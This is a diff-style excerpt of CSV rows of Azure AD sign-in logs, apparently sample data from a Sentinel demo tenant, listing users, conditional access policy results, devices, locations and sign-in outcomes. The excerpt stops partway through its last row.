+1027,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:05.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,defb16d0-c665-4eca-b2fa-3a9dcbd50f37,Microsoft.aadiam,Microsoft.aadiam,,Kara Cole,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '60eb367a-c3d0-4249-87bc-f5be7ee85e20', 'browser': 'Edge 18.1836', 'displayName': 'KARACOLE', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",15e86e8a-e140-4c96-8068-fad7d16b4000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -70.7354965209961, 'latitude': 43.08761978149414}, 'state': 'Maine', 'city': 'Kittery'}",none,none,none,none,[],{'errorCode': 0},Kara Cole,2d80a793-b857-48bc-8308-2411d8906bdd,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,15e86e8a-e140-4c96-8068-fad7d16b4000,SigninLogs,Sucess,43.08761978,-70.73549652
+1028,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:02.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,53990547-4be7-4dae-85b8-1314b99abd65,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",7688e8c0-f176-4f1e-95a2-c1ffbd870f00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,7688e8c0-f176-4f1e-95a2-c1ffbd870f00,SigninLogs,Sucess,50.6406517,5.572050095
+1029,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:00.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f7a28869-ae9b-49d7-867c-22cacb5c6559,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",11a868c6-5405-4103-99d2-d5c4a8d80e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,11a868c6-5405-4103-99d2-d5c4a8d80e00,SigninLogs,Sucess,50.6406517,5.572050095
+1030,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:46.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4b783129-84d5-440d-8448-fd7b4b68e5c4,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.471'}",58101571-c323-4e3c-9694-0b1272630e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,58101571-c323-4e3c-9694-0b1272630e00,SigninLogs,Sucess,35.01296997,-80.93171692
+1031,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:43.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,4b783129-84d5-440d-8448-fd7b4b68e5c4,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.471'}",3f80e775-4028-4bc5-9e8b-649bf4a50d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3f80e775-4028-4bc5-9e8b-649bf4a50d00,SigninLogs,Failed,35.01296997,-80.93171692
+1032,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:43.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,4b783129-84d5-440d-8448-fd7b4b68e5c4,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.471'}",3f80e775-4028-4bc5-9e8b-649bf4a50d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3f80e775-4028-4bc5-9e8b-649bf4a50d00,SigninLogs,Failed,35.01296997,-80.93171692
+1033,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:26.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4b783129-84d5-440d-8448-fd7b4b68e5c4,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.471'}",aa9828f4-3e2d-42fa-acbc-edb9fec71000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,aa9828f4-3e2d-42fa-acbc-edb9fec71000,SigninLogs,Sucess,35.01296997,-80.93171692
+1034,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:10.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3ba70abd-1fdd-41ac-9bd0-1ac6a89652df,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 2,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Firefox 74.0'}",e82050b8-a2c4-426d-8c05-8f1d68870e00,,,"{'countryOrRegion': 